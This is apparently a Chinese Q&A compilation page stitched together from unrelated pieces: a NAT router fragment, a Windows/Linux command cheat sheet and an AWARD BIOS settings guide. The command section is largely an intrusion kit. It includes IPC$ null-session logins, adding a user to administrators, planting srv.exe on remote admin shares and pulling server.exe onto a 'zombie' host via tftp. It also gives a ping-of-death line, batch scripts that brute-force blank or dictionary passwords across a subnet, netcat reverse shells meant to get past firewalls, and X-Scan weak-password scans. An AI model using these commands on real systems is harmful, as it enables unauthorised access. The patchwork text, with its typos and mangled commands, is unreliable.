4、選「設置有網路地址轉換(nat)路由協議的路由器」,不要選「設置internet連接共享(ics)」.(ics與nat的區別在於使用的容易程度上,為了啟用ics,只需要選擇一個復選框就可以了,而為了啟用nat,則需要更多的配置任務,此外,ics用於小型網路上的原因還在於:針對內部主機,它需要有一個固定的ip地址范圍;針對與外部網路的通信,它被限制在單個公共ip地址上;它只允許單個內部網路介面。)

後面還有寫不下了
自己看吧:http://www.1cfc.com/newbbs/archive/topic/220653-1.html
參考資料:http://www.1cfc.com/newbbs/archive/topic/220653-1.html

Ⅳ 網路連接的問題

DOS命令字典..收藏
net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C:到本地為H:
net use h: \\ip\c$ 登陸後映射對方C:到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup ***istrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意:***istrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況,常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況)
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話,就可查看對方最近登陸的用戶名(03前的為用戶名)-注意:參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由(數據包),參數:「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據,參數:「-l[空格]數據包大小」;「-n發送數據次數」;「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件,「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件

#2 二:

del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)
move 盤符\路徑\要移動的文件名 存放移動文件的路徑\移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中,"> "和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務,用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠 遠和登陸伺服器,默認埠為23
open ip 連接到IP(屬telnet登陸後的命令)
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑\文件名1 路徑\文件名2 /y 復制文件1到指定的目錄為文件2,用參數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe \\ip\***$ 復制本地c:\srv.exe到對方的***下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件,註:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指ASCLL格式文件
\\ip\***$\svv.exe c:\ 或:\\ip\***$\*.* 復制對方***i$共享下的srv.exe文件(所有文件)至本地C:
x 要復制的文件或目錄樹 目標地址\目錄名 復制文件和目錄樹,用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe 登陸後,將「IP」的server.exe下載到目標主機c:\server.exe 參數:-i指以二進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模式)進行傳送
tftp -i 對方IP put c:\server.exe 登陸後,上傳本地c:\server.exe至主機
ftp ip 埠 用於上傳文件至伺服器或進行文件操作,默認埠為21。bin指用二進制方式傳送(可執行文件進);默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由,將主要顯示網路地址Network addres,子網掩碼Netmask,網關地址Gateway addres,介面地址Interface
arp 查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化(最小化)運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件(目錄)的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔,只讀,系統,隱藏 屬性;用+則是添加為某屬性
dir 查看文件,參數:/Q顯示文件及目錄屬系統哪個用戶,/T:C顯示文件創建時間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間,而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序,並顯示出:請按任意鍵繼續....
if 在批處理程序中執行條件處理(更多說明見if命令及變數)
goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行(標簽必須單獨一行,且以冒號打頭,例如:「:start」標簽)
call 路徑\批處理文件名 從批處理程序中調用另一個批處理程序 (更多說明見call /?)
for 對一組文件中的每一個文件執行某個特定命令(更多說明見for命令及變數)
echo on或off 打開或關閉echo,僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值 設置cmd控制台前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為:EntSky\ )

#3 三:

ver 在DOS窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息(內存大小、系統版本、補丁版本、計算機名)
format 盤符 /FS:類型 格式化磁碟,類型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目錄名 創建目錄
replace 源文件 要替換文件的目錄 替換文件
ren 原文件名 新文件名 重命名文件名
tree 以樹形結構顯示出目錄,用參數-f 將列出第個文件夾中文件名稱
type 文件名 顯示文本文件的內容
more 文件名 逐屏顯示輸出文件
doskey 要鎖定的命令=字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行,重新調用win2k命令,並創建宏)。如:鎖定dir命令:doskey dir=entsky (不能用doskey dir=dir);解鎖:doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁碟D並顯示狀態報告;加參數/f並修復磁碟上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務默認埠23為其它任何埠
exit 退出cmd.exe程序或目前,用參數/B則是退出當前批處理腳本而不是cmd.exe
path 路徑\可執行文件的文件名 為可執行文件設置一個路徑。
cmd 啟動一個win2K命令解釋窗口。參數:/eff、/en 關閉、開啟命令擴展;更我詳細說明見cmd /?
regedit /s 注冊表文件名 導入注冊表;參數/S指安靜模式導入,無任何提示;
regedit /e 注冊表文件名 導出注冊表
cacls 文件名 參數 顯示或修改文件訪問控制列表(ACL)——針對NTFS格式時。參數:/D 用戶名:設定拒絕某用戶訪問;/P 用戶名:perm 替換指定用戶的訪問許可權;/G 用戶名:perm 賦予指定用戶訪問許可權;Perm 可以是: N 無,R 讀取, W 寫入, C 更改(寫入),F 完全控制;例:cacls D:\test.txt /D pub 設定d:\test.txt拒絕pub用戶訪問。
cacls 文件名 查看文件的訪問用戶許可權列表
REM 文本內容 在批處理文件中添加註解
netsh 查看或更改本地網路配置情況

#4 四:

IIS服務命令:
iisreset /reboot 重啟win2k計算機(但有提示系統將重啟信息出現)
iisreset /start或stop 啟動(停止)所有Internet服務
iisreset /restart 停止然後重新啟動所有Internet服務
iisreset /status 顯示所有Internet服務狀態
iisreset /enable或disable 在本地系統上啟用(禁用)Internet服務的重新啟動
iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時,若發生錯誤將重新開機
iisreset /noforce 若無法停止Internet服務,將不會強制終止Internet服務
iisreset /timeout Val在到達逾時間(秒)時,仍未停止Internet服務,若指定/rebootonerror參數,則電腦將會重新開機。預設值為重新啟動20秒,停止60秒,重新開機0秒。
FTP 命令: (後面有詳細說明內容)
ftp的命令行格式為:
ftp -v -d -i -n -g[主機名] -v 顯示遠程伺服器的所有響應信息。
-d 使用調試方式。
-n 限制ftp的自動登錄,即不使用.netrc文件。
-g 取消全局文件名。
help [命令] 或 ?[命令] 查看命令說明
bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
pwd 列出當前遠端主機目錄
put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中
get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中
mget [remote-files] 從遠端主機接收一批文件至本地主機
mput local-files 將本地主機中一批文件傳送至遠端主機
dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件
ascii 設定以ASCII方式傳送文件(預設值)
bin 或 image 設定以二進制方式傳送文件
bell 每完成一次文件傳送,報警提示
cp 返回上一級目錄
close 中斷與遠程伺服器的ftp會話(與open對應)
open host[port] 建立指定ftp伺服器連接,可指定連接埠
delete 刪除遠端主機中的文件
mdelete [remote-files] 刪除一批文件
mkdir directory-name 在遠端主機中建立目錄
rename [from] [to] 改變遠端主機中的文件名
rmdir directory-name 刪除遠端主機中的目錄
status 顯示當前FTP的狀態
system 顯示遠端主機系統類型
user user-name [password] [account] 重新以別的用戶名登錄遠端主機
open host [port] 重新建立一個新的連接
prompt 交互提示模式
macdef 定義宏命令
lcd 改變當前本地主機的工作目錄,如果預設,就轉到當前用戶的HOME目錄
chmod 改變遠端主機的文件許可權
case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母
cd remote-dir 進入遠程主機目錄
cp 進入遠程主機目錄的父目錄
! 在本地機中執行交互shell,exit回到ftp環境,如!ls*.zip

#5 五:

MYsql 命令:
mysql -h主機地址 -u用戶名 -p密碼 連接MYSQL;如果剛安裝好MYSQL,超級用戶root是沒有密碼的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格,其它也一樣)
exit 退出MYSQL
mysql*** -u用戶名 -p舊密碼 password 新密碼 修改密碼
grant select on 資料庫.* to 用戶名@登錄主機 identified by \"密碼\"; 增加新用戶。(注意:和上面不同,下面的因為是MYSQL環境中的命令,所以後面都帶一個分號作為命令結束符)
show databases; 顯示資料庫列表。剛開始時才兩個資料庫:mysql和test。mysql庫很重要它裡面有MYSQL的系統信息,我們改密碼和新增用戶,實際上就是用這個庫進行操作。
use mysql;
show tables; 顯示庫中的數據表
describe 表名; 顯示數據表的結構
create database 庫名; 建庫
use 庫名;
create table 表名 (欄位設定列表); 建表
drop database 庫名;
drop table 表名; 刪庫和刪表
delete from 表名; 將表中記錄清空
select * from 表名; 顯示表中的記錄
mysqlmp --opt school>school.bbb 備份資料庫:(命令在DOS的\\mysql\\bin目錄下執行);注釋:將資料庫school備份到school.bbb文件,school.bbb是一個文本文件,文件名任取,打開看看你會有新發現。
win2003系統下新增命令(實用部份):
shutdown /參數 關閉或重啟本地或遠程主機。
參數說明:/S 關閉主機,/R 重啟主機, /T 數字 設定延時的時間,范圍0~180秒之間, /A取消開機,/M //IP 指定的遠程主機。
例:shutdown /r /t 0 立即重啟本地主機(無延時)
taskill /參數 進程名或進程的pid 終止一個或多個任務和進程。
參數說明:/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid,/IM 要終止的進程的進程名,/F 強制終止進程,/T 終止指定的進程及他所啟動的子進程。
tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。
參數說明:/M 列出當前進程載入的dll文件,/SVC 顯示出每個進程對應的服務,無參數時就只列出當前的進程。

#6 六:

Linux系統下基本命令: 要區分大小寫
uname 顯示版本信息(同win2K的 ver)
dir 顯示當前目錄文件,ls -al 顯示包括隱藏文件(同win2K的 dir)
pwd 查詢當前所在的目錄位置
cd cd ..回到上一層目錄,注意cd 與..之間有空格。cd /返回到根目錄。
cat 文件名 查看文件內容
cat >abc.txt 往abc.txt文件中寫上內容。
more 文件名 以一頁一頁的方式顯示一個文本文件。
cp 復制文件
mv 移動文件
rm 文件名 刪除文件,rm -a 目錄名刪除目錄及子目錄
mkdir 目錄名 建立目錄
rmdir 刪除子目錄,目錄內沒有文檔。
chmod 設定檔案或目錄的存取許可權
grep 在檔案中查找字元串
diff 檔案文件比較
find 檔案搜尋
date 現在的日期、時間
who 查詢目前和你使用同一台機器的人以及Login時間地點
w 查詢目前上機者的詳細資料
whoami 查看自己的帳號名稱
groups 查看某人的Group
passwd 更改密碼
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通常用它來編譯C語言寫的文件
su 許可權轉換為指定使用者
telnet IP telnet連接對方主機(同win2K),當出現bash$時就說明連接成功。
ftp ftp連接上某伺服器(同win2K)

附:批處理命令與變數

1:for命令及變數 基本格式:
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數,如:%i ,而指定一個變數則用:%%i ,而調用變數時用:%i% ,變數是區分大小寫的(%i 不等於 %I)。
批處理每次能處理的變數從%0—%9共10個,其中%0默認給批處理文件名使用,%1默認為使用此批處理時輸入的的第一個值,同理:%2—%9指輸入的第2-9個值;例:net use \\ip\ipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3

(set):指定一個或一組文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{ 「(1 1 254)」第一個"1"指起始值,第二個"1"指增長量,第三個"254"指結束值,即:從1到254;「(1 -1 254)」說明:即從254到1 }

command:指定對第個文件執行的命令,如:net use命令;如要執行多個命令時,命令這間加:& 來隔開
command_parameters:為特定命令指定參數或命令行開關

IN (set):指在(set)中取值;DO command :指執行command

參數:/L 指用增量形式{ (set)為增量形式時 };/F 指從文件中不斷取值,直到取完為止{ (set)為文件時,如(d:\pass.txt)時 }。
用法舉例:
@echo off
echo 用法格式:test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:***istrator | find "命令成功完成" >>test.txt
存為test.bat 說明:對指定的一個C類網段的254個IP依次試建立***istrator密碼為空的IPC$連接,如果成功就把該IP存在test.txt中。

/L指用增量形式(即從1-254或254-1);輸入的IP前面三位:*.*.*為批處理默認的 %1;%%G 為變數(ip的最後一位);& 用來隔開echo 和net use 這二個命令;| 指建立了ipc$後,在結果中用find查看是否有"命令成功完成"信息;%1.%%G 為完整的IP地址;(1 1 254) 指起始值,增長量,結止值。
@echo off
echo 用法格式:ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存為:ok.exe 說明:輸入一個IP後,用字典文件d:\pass.dic來暴解d:\user.dic中的用戶密碼,直到文件中值取完為止。%%i為用戶名;%1為輸入的IP地址(默認)。http://www.jz5u.com

#7 七:

2:if命令及變數 基本格式:
IF [not] errorlevel 數字 命令語句 如果程序運行最後返回一個等於或大於指定數字的退出編碼,指定條件為「真」。
例:IF errorlevel 0 命令 指程序執行後返回的值為0時,就值行後面的命令;IF not errorlevel 1 命令指程序執行最後返回的值不等於1,就執行後面的命令。
0 指發現並成功執行(真);1 指沒有發現、沒執行(假)。
IF [not] 字元串1==字元串2 命令語句 如果指定的文本字元串匹配(即:字元串1 等於 字元串2),就執行後面的命令。
例:「if "%2%"=="4" goto start」指:如果輸入的第二個變數為4時,執行後面的命令(注意:調用變數時就%變數名%並加" ")
IF [not] exist 文件名 命令語句 如果指定的文件名存在,就執行後面的命令。
例:「if not nc.exe goto end」指:如果沒有發現nc.exe文件就跳到":end"標簽處。
IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字元串1==字元串2 命令語句 else 命令語句或 IF [not] exist 文件名 命令語句 else 命令語句 加上:else 命令語句後指:當前面的條件不成立時,就指行else後面的命令。注意:else 必須與 if 在同一行才有效。 當有del命令時需把del命令全部內容用< >括起來,因為del命令要單獨一行時才能執行,用上< >後就等於是單獨一行了;例如:「if exist test.txt. <del test.txt.> else echo test.txt.missing 」,注意命令中的「.」

(二)系統外部命令(均需下載相關工具):

1、瑞士軍刀:nc.exe

參數說明:
-h 查看幫助信息
-d 後台模式
-e prog程序重定向,一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式,用於入站連接
-L 監聽模式,連接天閉後仍然繼續監聽,直到CTR+C
-n IP地址,不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出,用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入,輸出關掉(用於掃錨時)
基本用法:
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向連接192.168.0.2的5354埠
高級用法:
nc -L -p 80 作為蜜罐用1:開啟並不停地監聽80埠,直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2:開啟並不停地監聽80埠,直到CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1:開啟並不停地監聽80埠,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2:開啟並不停地監聽80埠,直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用:nc -l -p 本機埠
在對方主機上用:nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆
本機上用:nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用:nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件到對方主機
備 註:
| 管道命令
< 或 > 重定向命令。「<」,例如:tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
@ 表示執行@後面的命令,但不會顯示出來(後台執行);例:@dir c:\winnt >> d:\log.txt 意思是:後台執行dir,並把結果存在d:\log.txt中
>與>>的區別 ">"指:覆蓋;">>"指:保存到(添加到)。
如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別執行二次比較看:用>>的則是把二次的結果都保存了,而用:>則只有一次的結果,是因為第二次的結果把第一次的覆蓋了。

#8 八:

2、掃錨工具:xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為:TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞,跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主機的標准埠狀態,NT弱口令用戶,最大並發線程數量為150,跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測「hostlist.txt」文件中列出的所有主機的標准埠狀態,CGI漏洞,最大並發線程數量為200,同一時刻最多檢測5台主機,顯示詳細檢測進度,跳過沒有檢測到開放埠的主機

Ⅵ 如何在內網建立FTP伺服器

1、通過電腦直接找到ftpserver.exe並雙擊運行。

Ⅶ BIOS設置詳解

BIOS 設置詳解
AWARD BIOS
AWARD BIOS是目前應用最為廣泛的一種BIOS。本文將詳細介紹一下AWARD BIOS中的有關設置選項的含義和設置方法,在AWARD BIOS的主菜單中主要有以下幾個菜單項:
Standard CMOS Setup(標准CMOS設定):
這個選項可以設置系統日期、時間、IDE設備、軟碟機A與B、顯示系統的類型、錯誤處理方法等。
(1)在IDE設備設置中,用戶可以在Type(類型)和Mode(模式)項設為Auto,使每次啟動系統時BIOS自動檢測硬碟。也可以在主菜單中的IDE HDD Auto Detection操作來設置。用戶還可以使用User選項,手動設定硬碟的參數。必須輸入柱面數(Cyls),磁頭數(Heads),寫預補償(Precomp),磁頭著陸區(Landz),每柱面扇區數(Sectorxs),工作模式(Mode)等幾種參數。硬碟大小在上述參數設定後自動產生。
(2)顯示類型可選EGA/VGA(EGA、VGA、SEGA、SVGA、PGA顯示適配卡選用)、CGA40(CGA顯示卡,40列方式)、CGA80(CGA顯示卡,80列方式)、MONO(單色顯示方式,包括高解析度單顯卡)等四種,以現在我們使用的計算機來看,絕大多數都屬於EGA/VGA顯示類型。
(3)暫停的出錯狀態選項有:All Errors(BIOS檢測到任何錯誤,系統啟動均暫停並且給出出錯提示)、No Errors(BIOS檢測到任何錯誤都不使系統啟動暫停)、All But Keyboard(BIOS檢測到除了磁碟之外的錯誤後使系統啟動暫停,磁碟錯誤暫停)、All But Disk/Key(BIOS檢測到除了鍵盤或磁碟之外的錯誤後使系統啟動暫停。
BIOS Features Setup(BIOS功能設定)
該項用來設置系統配置選項清單,其中有些選項由主板本身設計確定,有些選項用戶可以進行修改設定,以改善系統的性能。常見選項說明如下:
(1)Virus Warning(病毒警告):這項功能在外部數據寫入硬碟引導區或分配表的時候,會提出警告。為了避免系統沖突,一般將此功能關閉,置為Disable(關閉)。
(2)CPU Internal Cache(CPU Level 1 catch):預設為Enable(開啟),它允許系統使用CPU內部的第一級Cache。486以上檔次的CPU內部一般都帶有Cache,除非當該項設為開啟時系統工作不正常,此項一般不要輕易改動。該項若置為Disable,將會嚴重影響系統的性能。
(3)External Cache(CPU Level 1 catch):預設設為Enable,它用來控制主板上的第二級(L2)Cache。根據主板上是否帶有Cache,選擇該項的設置。
(4)BIOS Update:開啟此功能則允許BIOS升級,如關閉則無法寫入BIOS。
(5)Quick Power On Self Test:預設設置為Enable,該項主要功能為加速系統上電自測過程,它將跳過一些自測試。使引導過程加快。
(6)Hard Disk Boot From(HDD Sequence SCSI/IDE First):選擇由主盤、從盤或SCSI硬碟啟動。
(7)Boot Sequence:選擇機器開電時的啟動順序。有些BIOS將SCSI硬碟也列在其中,此外比較新的主板還提供了LS 120和ZIP等設備的啟動支持,一般BIOS,都有以下四種啟動順序:C,A(系統將按硬碟,軟碟機順序尋找啟動盤);A,C(系統將按軟碟機,硬碟順序尋找啟動盤);CDROM,C,A(系統按CDROM,硬碟,軟碟機順序尋找啟動盤);C,CDROM,A(系統按硬碟,CDROM,軟碟機順序尋找啟動盤)。
(8)Swap Floppy Drive:(交換軟盤驅動器)預設設定為Disable。當它Disable時,BIOS把軟碟機連線扭接端子所接的軟盤驅動器當作第一驅動器。當它開啟時,BIOS將把軟碟機連線對接端子所接的軟盤驅動器當作第一驅動器,即在DOS下A盤當作B盤用,B盤當作A盤用。
(9)Boot Up Floppy Seek:當Enable時,機器啟動時BIOS將對軟碟機進行尋道操作。
(10)Floppy Disk Access Contol:當該項選在R/W狀態時,軟碟機可以讀和寫,其它狀態只能讀。
(11)Boot Up Numlock Strtus:該選項用來設置小鍵盤的預設狀態。當設置為ON時,系統啟動後,小鍵盤的預設為數字狀態;設為OFF時,系統啟動後,小鍵盤的狀態為箭頭狀態。
(12)Boot Up System Speed:該選項用來確定系統啟動時的速度為HIGH還是LOW。
(13)Typematic Rate Setting:該項可選Enable和Disable。當置為Enable時,如果按下鍵盤上的某個鍵不放,機器按你重復按下該鍵對待;當置為Disable時,如果按下鍵盤上的某個鍵不放,機器按鍵入該鍵一次對待。
(14)Typematic Rate:如果Typematic Rate Setting選項置為Enable,那麼可以用此選項設定當你按下鍵盤上的某個鍵一秒鍾,那麼相當於按該鍵6次。該項可選6、8、10、12、15、20、24、30。
(15)Typematic Delay:如果Typematic Rate Setting選項置為Enable,那麼可以用此選項設定按下某一個鍵時,延遲多長時間後開始視為重復鍵入該鍵。該項可選250、500、750、1000,單位為毫秒。
(16)Security Option:選擇System時,每次開機啟動時都會提示你輸入密碼,選擇Setup時,僅在進入BIOS設置時會提示你輸入密碼。
(17)PS/2 Mouse Function Control:當該項設為Enable,機器提供對於PS/2類型滑鼠的支持,AUTO可以在系統啟動是自動偵測PS/2 Mouse,分配IRQ。
(18)Assign PCI IRQ For VGA:選Enable時,機器將自動設定PCI顯示卡的IRQ到系統的DRAM中,以提高顯示速度和改善系統的性能。
(19)PCI/VGA Palett Snoop:該項用來設置PCI/VGA卡能否與MPEG ISA/VESA VGA卡一起用。當PCI/VGA卡與MPEG ISA/VESA VGA卡一起用或使用其他非標准VGA時,該項應設為Enable。
(20)OS Select For DRAM>64MB:如果使用OS/2操作系統,使用64MB以上的內存。該項選為OS2。
(21)System BIOS Shadow:該選項的預設設置默認為Enable,當它開啟時,系統BIOS將拷貝到系統Dram中,以提高系統的運行速度和改善系統的性能。
(22)Video BIOS Shadow:預設設定為開啟(Enable),當它開啟時,顯示卡的BIOS將拷貝到系統DRAM中,以提高顯示速度和改善系統的性能。
(23)C8000-CBFFF Shadow/DFFFF Shadow:這些內存區域用來作為其他擴充卡的ROM映射區,一般都設定為禁止(Disable)。如果有某一擴充卡ROM需要映射,則用戶應搞清楚該ROM將映射地址和范圍,可以將上述的幾個內存區域都置為Enable;但這樣將造成內存空間的浪費。因為映射區的
地址空間將佔用系統的640K~1024K之間的某一段內存。
Chipset Features Setup(晶元組功能設定)
該項用來設置系統板上晶元的特性。常見選項如下:
(1)ISA Bus Clock frequency(PCICLK/4)ISA傳輸速率設定。設定值有:PCICLK/3;PCICLK/4。
(2)Auto Configuration(Enabled)自動狀態設定。
當設定為Enabled時BIOS依最佳狀況狀態設定,此時BIOS會自動設定DRAM Timing,所以會無法修改DRAM的細項時序,強烈建議選用Enabled,因為任意改變DRAM的時序可能造成系統不穩或不開機。
(3)Aggressive Mode(Disabled)高級模式設定。
若想獲得較好的效能時,而且系統在非常穩定狀態下,可以嘗試Enabled此項功能以增加系統效能,不過必須使用速度較快DRAM(60ns以下)。
Power Management Setup(節電功能設定)
該項為電源管理設定,用來控制主板上的「綠色」功能。該功能定時關閉視頻顯示和硬碟驅動器以實現節能的效果。
實現節電的模式有以下四種:
1.Doze模式,當設定時間一到,CPU時鍾變慢,其他設備照常運作;
2.Standby模式,當設定時間一到,硬碟和顯示將停止工作,其他設備照常運作;
3.Suspend模式,當設定時間一到,除CPU以外的所有設備都將停止工作;
4.HDD Power Down模式,當設定時間一到,硬碟停止工作,其他設備照常運作。
本菜單項下可供選擇的內容如下:
(1)Power Management節電模式的主控項,有四種設定:
Max Saving(最大節電)在一個較短的系統不活動的周期(Doze、Standby、Suspend、HDD Power Down四種模式的預設值均為1分鍾)以後,使系統進入節電模式,這種模式節電最大。
MIN Saving(最小節電)在一段較長的系統不活動的周期在這種情況下,(Doze,Standby,Suspend三種模式的預設值均為1小時,HDD Power Down模式的預設值為15分鍾)後,使系統進入節電模式。
